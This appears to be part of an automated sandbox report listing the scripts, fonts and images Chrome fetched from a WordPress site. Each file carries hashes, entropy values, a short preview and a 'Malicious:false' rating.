                                                                                                          Preview:/**. * Swiper 5.3.6. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 29, 2020. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Swiper=t()}(this,(function(){"use strict";var e="undefined"==typeof document?{body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEvent:function(){return{initEvent:function(){}}},createElement:function(){return{children:[],childNodes:[],style:{},setAttribute:function(){},getElementsByTagName:function(){return[]}}},location:{hash:""}}:document,t="undefined"==typeof window?{document:e,navigator:{userAgent:""},
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):27496
                                                                                                          Entropy (8bit):5.410888941378586
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:gWPf83zSiRoM1FG9hAQjuijzALfGW1sIJZKBd0EHF7uqGCd2u/L3i5uIcgXMulJQ:gWPf83zSiRoM1FG9hAQjuijzALfGW1sL
                                                                                                          MD5:4E5DB8F0A2828EA3FA8130DB2C6408CE
                                                                                                          SHA1:50ACCF340009875F95BD39A0E1F949ED30104898
                                                                                                          SHA-256:4B318C9EDC2D8C3A830EA62766D0EC108D7D2C0DCE992E2F10B9036960E47E1D
                                                                                                          SHA-512:2F9CB12428A6890A8A10D9425E7F14F30C74B48FCE642197D992022D617CADB39B17BCD3DE194B0B8E15884C0A29B0ADC62CC0B11185CE7B9E41F975A43D60C8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.googleapis.com/css?family=Mulish%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joiaqRXBA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joraqRXBA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2jogaqRXBA.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Mulish';. font-style:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 32 x 32, 8-bit gray+alpha, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):552
                                                                                                          Entropy (8bit):7.515583549045739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7FGKnMQZRv9NIzgNkarOBOoDTghZ4OLUzWnU4KhNvWhaNE3w0I:OGKnMQZ50gxOwMTgh70Wn36VWuE3s
                                                                                                          MD5:1CBA01736A152F08BA1804CCDF26EA7D
                                                                                                          SHA1:C0DE3FA29D5C4D9C37D767A3C81B1B71E070A26F
                                                                                                          SHA-256:136E61B06AFF51781F423C992F49229C3DDB882657E18F1603AB3A08D9CAF072
                                                                                                          SHA-512:C1A2135AF17DF98C1F8ACB232FC2E84D62433DD480F27DE452D0C6376A10D2561829310A2C9883F4E82A4B60AB3B1C708054E1C40BC042835E02D9316BC64599
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR... ... ......s......IDATH...R.Q...$ .................\.....x...66..1.....A...2.OTBl..K046.n.gv.{v.,....u_.<q^F.+..y....A3`......4..jC&...V.^..xj..+y.ze#.W..h.`...0......}.z.=v.&.6..Y...[.k...9...C..Y.......!@...../`.7...X._.].F...V..C.......O....C...).f}.UH....4.:.Zw.*.,..7..M..'.....s_A.v.8`.}....`.*..........{S@:.+Y.}..U......q.6....+p..mpS...&.^e;A.+..o...L..XD..}.iI.e.Ud.Z.C...*'e0n....%..%C./.4s.... .e!2g..!)+oW'."k....T|.Xf..m.Z.0}l...s...t.-E....*.S..l'..5..=.Wq..XU.q... ?.;..z.}......IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10578)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10759
                                                                                                          Entropy (8bit):5.108770861795029
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Cr0AcBogU9EEk7Wxcf55I/6wG5klFhBsR0PWXYpt:Cr0AEPU9EccbUt
                                                                                                          MD5:EC2777F6B09C345D2AB0DEF96B5CAB9D
                                                                                                          SHA1:10713118D9F7AA90BDCE30EA21508B2E99B8B33F
                                                                                                          SHA-256:D9B268266AF74B5C0834E2A519303CA97C5427C5FB7ABB3B89AD29E07664BE14
                                                                                                          SHA-512:77B8845DAA7449A72A6365E75AE56781C82B503619F7D90CE4BA0F5A8C025B59F3881F0BD3B51570B2C3A6567A6BE1E783615954D84B9FFF95812E230CC8FFCB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Slider 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","./mouse","../keycode","../version","../widget"],e):e(jQuery)}(function(o){"use strict";return o.widget("ui.slider",o.ui.mouse,{version:"1.13.3",widgetEventPrefix:"slide",options:{animate:!1,classes:{"ui-slider":"ui-corner-all","ui-slider-handle":"ui-corner-all","ui-slider-range":"ui-corner-all ui-widget-header"},distance:0,max:100,min:0,orientation:"horizontal",range:!1,step:1,value:0,values:null,change:null,slide:null,start:null,stop:null},numPages:5,_create:function(){this._keySliding=!1,this._mouseSliding=!1,this._animateOff=!0,this._handleIndex=null,this._detectOrientation(),this._mouseInit(),this._calculateNewMax(),this._addClass("ui-slider ui-slider-"+this.orientation,"ui-widget ui-widget-content"),this._refresh(),this._a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3527 x 1006, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41138
                                                                                                          Entropy (8bit):7.757697474545904
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:UYS8TICIGOGxLtmRFzLnIg++X+A/6x+UL9eopupay96p:V1TlnpxLoRF3nmESg7pZ9S
                                                                                                          MD5:3E4B64FB4725FDFAFA12C8ED7ED195E3
                                                                                                          SHA1:BDB761604E2F572EBED5DAA79C5C7614935A4883
                                                                                                          SHA-256:DBE4D284B9804D59E34887831F9698B5F48EAA787CC5407B9E59AB0F2D4B6D0D
                                                                                                          SHA-512:2C47249260A8A20A88E3D34C1E8039309C5EC64B33B02D22A2FE7F1B1E11C564E86CD61C9A3CCD451F397B35C3A5CD7B535B20B06DE0F010D9430F57BF7AA4B8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............@.......pHYs..,J..,J.wztM...3PLTEGpL.................................................A.*....tRNS. .0..`.@...p.P..(.. .IDATx....(........\...=.C..*..7G8l!t..*...0M.8._t.._.<.q....^K=M..1<4.....P8..A.......G.................k./...mn..C.5.5......a..y..9.u..6........+.n.=.&a..d................~5d.....p.......@...0.4.E.9...:.O...w.'....Y..........u.....qEaM.r.G....o........z..0MS.O........Gn.&..c...-.c....o.0.6.X....@mz..5N.3k.\,....l...z../....0y....LWf..G.8.c1v..<r.K.~.\....-.W..}.d.H..l.R.../Eg..cI\. ....zl......U.....q?k.$+.x\..O|....DP..Ug).P..1O....<...MK. 'o..(x..Rz.kJ........[lK.......Q...'.R=.:d......8......q.....|..M......e.&.Z,n..q..qAq.....m.z..*+.....o.9Y..x\...S-U...Y"...mrS...S.j.s?.'{..rF<m...i.......q..@}..Y.k...+<...}....3...4.P....&....w]M.H...^2.o..{..*+.W..I....<......tDRi.2.-[o..}Zcg...^.q?~.Q*..8.......q..J....J..0.qg.'.Ig...-..N..u<...}x...19<.kt.L.w..43...q..y...m.a....8_.|.......r..Go....b....5
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):78597
                                                                                                          Entropy (8bit):7.356715458451207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:ikeftg6k86229/TuqRU2KaTye0GmO1ihv2F3bSICwCRUcdw5b0QowTtM:Feu6kflTvp9TTXmxhv2Fr7CecW5tTtM
                                                                                                          MD5:1A4FD5C8E63CA02ECEA3BDC328CD8A29
                                                                                                          SHA1:467FD2E36B0D900F672C17DA3C9753E35E3BE15F
                                                                                                          SHA-256:3F1E81E4AB0288BEA1A59B1A63E0650418E04426DD3EF30B826AD1D668649290
                                                                                                          SHA-512:36C361018C6A5E2A46705A8E3015E4FE48E245689D9F21F654B692F78100531557157E988FDB84E29F1A29D3A2F61FB1B6D02B9BFF3918ECE4FBEAF8B4746027
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME........q.... .IDATx....ud7.'..q.......mA.Z0Z.V.t....`..L...z..`H.H....>G.?U$2I..~.9zR.....|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`R.............q..s......13_T.....X.@......Kj.]G...%".T.C.F...O...G..Zk%"~r..:O?E.O^.g..c.........z......*.....3.H.....`9......T
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2935
                                                                                                          Entropy (8bit):4.174503977015458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7v1If1Gl2CyoE7yrrVOiZDH25ByL0LuPoPBPHqPYnBu0dif0FWJOqrUIW:wW2CyoE7yPbZQQouQ5vqAn4ki2WBwIW
                                                                                                          MD5:5B2F6DA440BA208EECC15960E70D0B94
                                                                                                          SHA1:C9A817396AE1643141586206B0D320A8C7165C63
                                                                                                          SHA-256:97F0CACD19D339EFCC1A6B913F155C4002DF12FB9EA984D975BA87D481B2C67A
                                                                                                          SHA-512:66CA5C97A7383112F9D0D5CD89EE8DFC0937AF1235C269684A85F45C3A02035FAF38C3B91FED297810E37D6C333E883A00A44120B734861B9302EBD84112BEA9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/slider/js/html_types/slider.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_sliders() {. jQuery.each(jQuery('.woof_taxrange_slider'), function (index, input) {... try {. .. var slags = jQuery(input).data('slags').split(',');. var tax = jQuery(input).data('tax');.. var skin = jQuery(input).data('skin');. var current = String(jQuery(input).data('current')).split(',');. var from_index = 0, to_index = slags.length - 1;.. //***. if (current.length > 0 && slags.length > 0) {. jQuery.each(slags, function (index, v) {. if (v.toLowerCase() == current[0].toLowerCase()) {. from_index = index;. }. if (v.toLowerCase() == current[current.length - 1].toLowerCase()) {. to_index = index;. }. });. } else {. to_index = parseInt(jQuery(input).data('max'), 10) - 1;. }.. jQuery(inpu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 1026 x 660, 8-bit colormap, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):336687
                                                                                                          Entropy (8bit):7.9371821202017
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:1dA1RXS9wVXD6NETJlOHgP7Yw1ltE5SIALEf1nOrt1Q6dzx5ic6q:1qPXmwOn47YHBAkOro6lx5iG
                                                                                                          MD5:9F132C14B2459786AE408925E2D69971
                                                                                                          SHA1:91C9D644293E9E0FC4FA58AD1C6B14F942A468D0
                                                                                                          SHA-256:FD2690B49719B6AD474EEF9B3AD4138CE6EAB5DB3DAD584696A3893217D1FFCA
                                                                                                          SHA-512:B53A1AF676819FFD6713001BFC620E32CB235275C7CD5D1C1711EEE1D638555C92427BBFCB6EE178B72192B9AB9BEDAA344863C9CA1041EC93D10C6570AD71A3
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png
                                                                                                          Preview:.PNG........IHDR...............j.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Progetto senza titolo - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-04</Attrib:Created>. <Attrib:ExtId>084c4f8e-910b-4d8c-a0ab-d8b9c35096cf</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.ad
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 768 x 768, 8-bit colormap, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):285114
                                                                                                          Entropy (8bit):7.972341436872587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:AkhuY98l42J/RTWipHWAYJRKXIFlH6PsDXR1DAq0h+IJ:AtY9qdHWrJRK4Flm+1cFJ
                                                                                                          MD5:D7E3EEFEA4C22E58ACE761DCC18A91D5
                                                                                                          SHA1:7C1251F2CFCF32D08ACBADF8449C7512D64E0CDE
                                                                                                          SHA-256:A83E5AF2BA81F1463A67A7E244D78838D937883BAAA2C1EBD1E69AA2EABA4C69
                                                                                                          SHA-512:0F68477933113AE1450BB19ED86647B09CE8A2E02E661B0CED86200334327273620B876E20F613500E547EF7C4213AE379F5180AE7A8D603B0B88B318A641C8A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-4@4x-768x768.png
                                                                                                          Preview:.PNG........IHDR.............._.....pHYs..........+......PLTE............................................................................................................/'+......<28......C:AA6<.........-#'...G=E2+. ...........)."...&..#..JBIOFN...ZT`5/56+1QJU ..........WPZ)"%.....<.2......v._[ib_n........................PO]..z.;6>.}...!. .+3...P=Fy_m....{q.esjgv(%,..........ts.$ $bPX..tA>JUAJp\hiQ]WWg<)(plynVb......XMTYGNFDP3!!.r.........j|...5&()../...rj..wbZbJ:?<9D.l{52;JIViemzds~...q...{D21bJR.lfjm.{z.........G3;.wo...........|r..bcv....f^.......................rgS3,qw...`\...G,%.lb.....yYf..............XA?P:7...eF?...oJC....WQ..|`:3...........yOJ....~..sj.........sWS...="...........{tw.........................[S......................ws.................b^............K.J.....tRNS..........R-... .IDATx.[.n.H.5Y(.....2.h......w.....Y'.X.....I......~.......D.:1.hc.].V..!...G....{........{M.=S.+.*s.*...&;.U../w/....yY..:.?(..6..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (326)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):47503
                                                                                                          Entropy (8bit):4.578612796150673
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:F37SUuvHLW+lt6o6Yy8KUPNw/NHYGEPQtqmIrbWtGAQC:FwoxYyjUPNw/NHYCrwAQC
                                                                                                          MD5:85E54FA10ECCE4F46CF83953EB1431A2
                                                                                                          SHA1:56EC60080765E2B1C71BF7B86BD349825D0BA78E
                                                                                                          SHA-256:FA8A837C69930D75A3C3A05C803A8271BD57AE5DD61FBE81D4341F38D1F58165
                                                                                                          SHA-512:F97657186A18B4092889AA1CB49D2767DF2B0BA15C0F24130A23B061A350B22D780C06589643E2E8DEC4CCF726FB51EA993C62FA59E211C9E589C295F78F0BF9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version WOOF Custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.."use strict";..(function() {. var $, AbstractChosen, Chosen, SelectParser,. bind = function(fn, me){ return function(){ return fn.apply(me, arguments); }; },. extend = function(child, parent) { for (var key in parent) { if (hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; },. hasProp = {}.hasOwnProperty;.. SelectParser = (function() {. function SelectParser() {. this.options_index = 0;. this.parsed = [];. }.. SelectParser.prototy
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 768 x 768, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):257674
                                                                                                          Entropy (8bit):7.968231333512948
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:6m4Y9f1jov6h+gyMiwqSXHzcPNqWzX4/COUuk3:aYHjoFgOSYs4O8
                                                                                                          MD5:8E295C17B44D3ECF748F40C7230A94D8
                                                                                                          SHA1:02E3E11C64D31C14EB21249CD0A0B5FC1DCC0026
                                                                                                          SHA-256:09E0BC14308F9CB7B772418A37E142F5A20A5586EFCE5715CEF001C32F687FF9
                                                                                                          SHA-512:6B2A4DD7520C4780FC09AE5FBE817E5423FECC5F537B4F247AD5B782150BD3B3546E7CFD6FA1D05680516F70C847E94CE104DE4EE3F3ECB29501B2646836E027
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............._.....pHYs..........+......PLTE...&.....;....................4"....R@; ..-%'...$.!+..................................................................................................7A49C6?I<5>24<1...08-...2:/=F;......;C:6>58A7AK>......;F8..................6+.......................kmmDNBnqqtxx......ruq...nqm~..........MNK...hji.................fhg...GQEw{|...WYVZ\Ybdb|.}+2'TUS......QRO...egd...]_\quuHIG.........._a`.................KUJ.........}.....kmh............PZO...............w{w.........'-#... ........T`T...y~....DFA....... .......".....Zf[@A>...<=81,.!'.vxrH<@( #...-))885+$'!..F66z}y_mb(..0#"7.1%.....330...>8<3'(SBBS>9&%"`QT...8*+...I3+%..:27P91SGL^IDdsi9& iyq>13...2 .......{..n\[u..o.y...,.....@/,>*$...nNE.....~id........i<5..........TLE-$....`][*$..~.so.......yp........s.....tRNS...................'... .IDATx..Y=o.H.6.".b..F..HC...-..... .Z.]....<.`..L..y.q"...R,D+.B.c....>SX#.m @...w.1.R....../.(.y..y'[?.z..j..t..../0.'}.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2219
                                                                                                          Entropy (8bit):5.409739127256831
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1OLNOlOLNVFZKOLNHOLNk3yOLN5AOLNMJc+umOLNY1N0xD:1OLNOlOLNVFZKOLNHOLNk3yOLNqOLNM0
                                                                                                          MD5:A1B66AE4FBB0EFF2B25D263E7E0E3776
                                                                                                          SHA1:3C2688F0D491CA74EA7150AF27F4232401D46767
                                                                                                          SHA-256:ADF768C23E06CAA3676973294122E24048A1296AE400745BA47E08BD39276E06
                                                                                                          SHA-512:A4E5CD3C596FDA473D5BF9B16AD25CE91ED5DC91265BCA9C24897DEE75F8D12EEFE56400098D46364411D06F414BCCDE5AFC53F18B15B2AACE104A7AD893D41C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.googleapis.com/css?family=Roboto:400
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');. unicode-range: U+0370-0377
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (12198), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12198
                                                                                                          Entropy (8bit):5.031745242580206
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GngaW9ELBD26z861V/CvJiVKIsvfT+6EdpEsBpP9Qwo7Q4a99RfuzqXppc4mmm9t:Ggz9kBD26861V/wsVKIsvTEdpEsnmwoz
                                                                                                          MD5:3819C3569DA71DAEC283A75483735F7E
                                                                                                          SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
                                                                                                          SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
                                                                                                          SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2577)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2578
                                                                                                          Entropy (8bit):5.177015723485366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mPTblyuvUkJipDUGr207o/9QZOF1JzOTPUzGbe2yhL4rXpDeiUkLTj7fWfPfpC7X:mPnlyuv/IpDUGr20KqZOFPOzUb2nrXpZ
                                                                                                          MD5:9BB8540493A7FE11B229870EB37BE165
                                                                                                          SHA1:D77F17CB9057DC8F622B8C0BF23F6ACB739B3B8E
                                                                                                          SHA-256:4A7EE62EB33F3BBB66C2151E5CAC6BF4904E28302EFC36128F3E3CCAE6FDE580
                                                                                                          SHA-512:FB245059108EE476BFBCA60A96D401C2796EE44B646E0874D41B5FDB1204A66E3BEC6A4AB8E155E50489B3ADF48BD609683B3D1C020B9F39D084A915F8377773
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.6.1
                                                                                                          Preview:(function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={u
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (572)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):226005
                                                                                                          Entropy (8bit):5.484111073245769
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:gydAd/2OH4cC/bAI9gZ/lK3qVjHSVABmvgsdtP+id:gydwuTAIaZ/M3KLSVABodh+u
                                                                                                          MD5:185B1E23373603D639FB2116758CC4C7
                                                                                                          SHA1:E9E95055B654A96946AB2899FC24CA813DE83885
                                                                                                          SHA-256:323B2A37D46054AA64A27AB91DB0B6D6C25BFBA00DA526291BF3B7FF2B6FA016
                                                                                                          SHA-512:8CD6344626C91B1D818B2E4672AA9665876DB5B3D7D60EE81F70840B598F701E1E6EDAAC9299F9DDEB9204F12BF3DF7B5CE5C21F96739F10B5065EC553AFFC88
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function t(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Oa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Oa(t(ba))}.var Lf="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Mf;if("function"==typeof Object.setPrototypeOf)Mf=Object.setPrototypeOf;else{var Jh;a:{var Kh={a:!0},Lh={};try{Lh.__proto__=Kh;Jh=Lh.a;break a}catch(ba){}Jh=!1}Mf=Jh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Cm=Mf;.function Dm(ba,ta){ba.prototype=Lf(ta.prototype);ba.prototype.constructor=ba;if(Cm)Cm(ba,ta);else for(var $a in ta)if("p
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (13479)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13577
                                                                                                          Entropy (8bit):5.272065782731947
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                          MD5:9FFEB32E2D9EFBF8F70CAABDED242267
